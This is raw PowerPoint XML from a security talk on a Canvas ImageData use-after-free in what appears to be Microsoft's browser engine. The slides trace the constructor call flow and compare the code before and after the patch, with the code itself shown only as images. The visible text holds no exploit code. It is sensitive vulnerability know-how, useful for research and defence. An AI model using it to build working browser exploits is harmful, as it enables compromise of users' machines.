                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="SimHei" charset="-122"/>
              </a:rPr>
              <a:t>::InitializeFromUint8ClampedArray</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="25" name="图片 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2406755C-04FD-41B1-8346-C57615B502BC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1078126" y="3659548"/>
            <a:ext cx="10949708" cy="1740333"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="矩形 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C3EC0ADF-5A95-4085-9EA8-331E5FB6D27F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1072404" y="5654942"/>
            <a:ext cx="10959176" cy="2308324"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="SimHei" charset="-122"/>
              </a:rPr>
              <a:t>ImageData</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="SimHei" charset="-122"/>
              </a:rPr>
              <a:t> object constructor call flow is as follows</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:ea typeface="SimHei" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="SimHei" charset="-122"/>
              </a:rPr>
              <a:t>Before patch</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="SimHei" charset="-122"/>
              </a:rPr>
              <a:t>Function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="SimHei" charset="-122"/>
              </a:rPr>
              <a:t>CFastDOM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="SimHei" charset="-122"/>
              </a:rPr>
              <a:t>::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="SimHei" charset="-122"/>
              </a:rPr>
              <a:t>CImageData</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="SimHei" charset="-122"/>
              </a:rPr>
              <a:t>::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="SimHei" charset="-122"/>
              </a:rPr>
              <a:t>DefaultEntryPoint</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="SimHei" charset="-122"/>
              </a:rPr>
              <a:t> -&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="SimHei" charset="-122"/>
              </a:rPr>
              <a:t>function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="SimHei" charset="-122"/>
              </a:rPr>
              <a:t>CCanvasImageData</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="SimHei" charset="-122"/>
              </a:rPr>
              <a:t>::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="SimHei" charset="-122"/>
              </a:rPr>
              <a:t>Var_type_constructor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="SimHei" charset="-122"/>
              </a:rPr>
              <a:t> -&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="SimHei" charset="-122"/>
              </a:rPr>
              <a:t>Function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="SimHei" charset="-122"/>
              </a:rPr>
              <a:t>CCanvasImageData</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="SimHei" charset="-122"/>
              </a:rPr>
              <a:t>::InitializeFromUint8ClampedArray</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1926452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3200" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-ea"/>
                </a:rPr>
                <a:t>Canvas </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-ea"/>
                </a:rPr>
                <a:t>ImageData</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-ea"/>
                </a:rPr>
                <a:t> UAF Vulnerability Analysis and </a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-ea"/>
                </a:rPr>
                <a:t>Exploitation </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-ea"/>
                </a:rPr>
                <a:t>: Patch Analysis</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-ea"/>
                <a:cs typeface="SimHei" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="图片 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B961E9A5-0021-4B97-B484-F6F075AD548B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1114803" y="3251200"/>
            <a:ext cx="5240146" cy="4733313"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="图片 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B6CFAA88-21FE-4231-A9EE-732E59021DE4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6354949" y="3251199"/>
            <a:ext cx="5525007" cy="4733313"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="矩形 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C34CDBE9-CC70-49E3-9293-0F43BC298CB0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1078125" y="2614770"/>
            <a:ext cx="6604565" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="SimHei" charset="-122"/>
              </a:rPr>
              <a:t>Function</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="SimHei" charset="-122"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="SimHei" charset="-122"/>
              </a:rPr>
              <a:t>CCanvasImageData</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="SimHei" charset="-122"/>
              </a:rPr>
              <a:t>::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="SimHei" charset="-122"/>
              </a:rPr>
              <a:t>Var_type_constructor</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:ea typeface="SimHei" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="文本框 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FF7BFA8B-24BB-435C-8088-F9A9CF6DFD8F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1114803" y="8086160"/>
            <a:ext cx="4242495" cy="432554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Before patch</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="文本框 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{20E04E75-C73E-4BA5-8AE6-084C5EC623A3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6554852" y="8143106"/>
            <a:ext cx="4242495" cy="432554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>After patch</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="矩形 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EB98A608-DA57-4D3E-8E9E-9796B9691A2C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="1677606" y="6483902"/>
            <a:ext cx="4714021" cy="24455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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3012855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935295"/>
            <a:ext cx="10313668" cy="1024134"/>
            <a:chOff x="383732" y="909324"/>
            <a:chExt cx="12098995" cy="1391150"/>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909324"/>
              <a:ext cx="1629722" cy="1391150"/>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909324"/>
              <a:ext cx="10629695" cy="1391150"/>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a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-ea"/>
                </a:rPr>
                <a:t> Background Knowledge</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="内容占位符 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2EE87A79-B7B6-4B93-9A49-88BF22D73F20}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="987868" y="2550693"/>
            <a:ext cx="11133967" cy="7462517"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="37481904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3200" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-ea"/>
                </a:rPr>
                <a:t>Canvas </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-ea"/>
                </a:rPr>
                <a:t>ImageData</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-ea"/>
                </a:rPr>
                <a:t> UAF Vulnerability Analysis and </a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-ea"/>
                </a:rPr>
                <a:t>Exploitation </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-ea"/>
                </a:rPr>
                <a:t>: Patch Analysis</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-ea"/>
                <a:cs typeface="SimHei" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="文本框 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{09906678-4EE1-4C8D-A681-20E1D11A19EA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1078125" y="2431025"/>
            <a:ext cx="10011053" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Before the patch, the function InitializeFromUint8ClampedArray</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="85000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="SimHei" charset="-122"/>
              <a:ea typeface="SimHei" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="19" name="图片 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4514FADB-9D1F-4DEB-8659-A62878A87DAF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1078126" y="3051207"/>
            <a:ext cx="5628858" cy="2755988"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="矩形 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{95732636-3046-4B29-9DAB-46D2C5B315F5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="1157612" y="5401872"/>
            <a:ext cx="1395088" cy="12936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7C84257A-12C8-4A58-BEC5-D52D05AED1F2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6685720" y="4808486"/>
            <a:ext cx="5425345" cy="1323439"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CCanvasImageData</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>::InitializeFromUint8ClampedArray writes the buffer pointer of the Unit8ClampArray to the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ImageData</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> object.</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="22" name="图片 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E7C40556-C434-4BAA-ADB0-3249076E9F63}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6751039" y="3009711"/>
            <a:ext cx="5295226" cy="1751804"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="矩形 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1D6354AA-A12C-460F-942B-630970AFB594}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="8182085" y="3941990"/>
            <a:ext cx="1952515" cy="21988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24" name="连接符: 肘形 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7242B9DC-E89E-431D-926D-DF57F1DBFABF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="20" idx="3"/>
            <a:endCxn id="23" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="2552700" y="4051934"/>
            <a:ext cx="5629385" cy="1414622"/>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5" name="文本框 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{944E347F-F320-4091-BC12-C45FECD24881}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1078127" y="6128383"/>
            <a:ext cx="8082498" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>After the patch, the function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Var_type_constructor</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="85000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="SimHei" charset="-122"/>
              <a:ea typeface="SimHei" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="26" name="图片 25">
